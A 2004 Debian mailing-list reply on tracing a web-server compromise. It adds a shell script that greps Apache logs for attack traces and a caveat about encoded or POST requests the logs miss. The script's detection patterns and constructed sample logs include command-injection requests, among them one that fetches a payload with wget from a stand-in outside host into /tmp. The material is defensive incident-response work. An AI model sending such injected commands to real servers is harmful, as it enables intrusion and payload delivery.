On Tue, Jun 15, 2004 at 02:32:21PM +1000, Ross Tsolakidis wrote:
> "Wipe, install, set up chkrootkit and run it often."
> I've already done that. There was no rootkit.
>

An alternative to chkrootkit is rkhunter - it's a set of scripts. You can
find the web address on something like freshmeat.net or Google easily.

[snip]

> I need to find the vulnerable code on this box. And I have no idea
> where to begin.
> I've tried running virus scans, nothing is infected.
>
> [snip]

The files you found within /tmp - grep Apache's access /and/ error logs
for these file names. Other common things to grep for include the use of
"uname -a", "ls -l" and "wget", remembering you may need to substitute
%20 for a space:

# grep -i 'uname%20-a' {access,error}.log
# grep -i 'wget' {access,error}.log

How about running a packet sniffer on port 80 too and monitoring the
traffic? Log to a text file and grep that.

HTH.
David.

-- 
.''`.  David Ramsden <[EMAIL PROTECTED]>
: :' : http://david.hexstream.eu.org/
`. `'` PGP key ID: 507B379B on wwwkeys.pgp.net
 `-    Debian - when you have better things to do than to fix a system.
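The log search David describes, as an added example that is not part of the original mail. It extends his two grep lines into one shell script that searches Apache access and error logs for the command strings he lists ("uname -a", "ls -l", "wget") plus the /tmp paths, matching each with a literal space, a %20 or a + (Apache logs the request line as received, so an encoded space stays encoded). The log lines, IP addresses, file names and the name grep_webshell_traces are all constructed for the demo.

```shell
#!/bin/sh
# Added example (not from the original mail): grep Apache logs for the
# command strings an attacker typically pushes through a vulnerable CGI
# or PHP script. All file names and sample log lines below are made up.

# Extended-regex fragments to hunt for. A literal space in a fragment is
# expanded to match " ", "%20" or "+" so that URL-encoded requests in the
# access log and decoded strings in the error log both hit.
PATTERNS='uname -a
ls -l
wget
/tmp/'

# Turn PATTERNS into a single ERE alternation: "uname(%20|\+| )-a|ls(...)".
build_regex() {
  printf '%s\n' "$PATTERNS" |
    sed 's/ /(%20|\\+| )/g' |
    paste -sd'|' -
}

# Search the given log files case-insensitively. Output is grep's usual
# "file:line" (or just the line for a single file); exit status is grep's.
# "--" keeps a regex that starts with "-" from being read as an option.
grep_webshell_traces() {
  regex=$(build_regex)
  grep -iE -- "$regex" "$@"
}

# Write two small constructed logs into DIR (default ".") so the script can
# be exercised offline. Lines 2-4 of access.log and line 2 of error.log are
# the ones an attacker would have produced; the rest is normal traffic.
make_sample_logs() {
  dir=${1:-.}
  cat > "$dir/access.log" <<'EOF'
10.0.0.5 - - [15/Jun/2004:14:01:02 +1000] "GET /index.php HTTP/1.1" 200 512 "-" "Mozilla/4.0"
10.0.0.9 - - [15/Jun/2004:14:02:11 +1000] "GET /cgi-bin/vuln.cgi?cmd=uname%20-a HTTP/1.0" 200 91 "-" "curl"
10.0.0.9 - - [15/Jun/2004:14:02:40 +1000] "GET /cgi-bin/vuln.cgi?cmd=wget+http://203.0.113.7/x.tgz HTTP/1.0" 200 0 "-" "curl"
10.0.0.9 - - [15/Jun/2004:14:03:05 +1000] "GET /cgi-bin/vuln.cgi?cmd=ls%20-l%20/tmp HTTP/1.0" 200 430 "-" "curl"
10.0.0.5 - - [15/Jun/2004:14:05:00 +1000] "GET /images/logo.png HTTP/1.1" 200 2048 "-" "Mozilla/4.0"
EOF
  cat > "$dir/error.log" <<'EOF'
[Tue Jun 15 14:02:12 2004] [error] [client 10.0.0.9] sh: uname: not found
[Tue Jun 15 14:02:41 2004] [error] [client 10.0.0.9] --14:02:41-- http://203.0.113.7/x.tgz => `/tmp/x.tgz'
EOF
}

# Usage: ./find_traces.sh /var/log/apache/access.log /var/log/apache/error.log
if [ "$#" -gt 0 ]; then
  grep_webshell_traces "$@"
fi
```

Two caveats when running this against a real box: the "ls -l" fragment is short enough to hit unrelated lines, so expect to eyeball the output, and a request that was double-encoded (%2520) or sent in a POST body will not appear in the access log at all, which is exactly why the port-80 sniffer David suggests is worth running alongside; a `tcpdump -A` capture saved to a text file can be fed to the same grep_webshell_traces function.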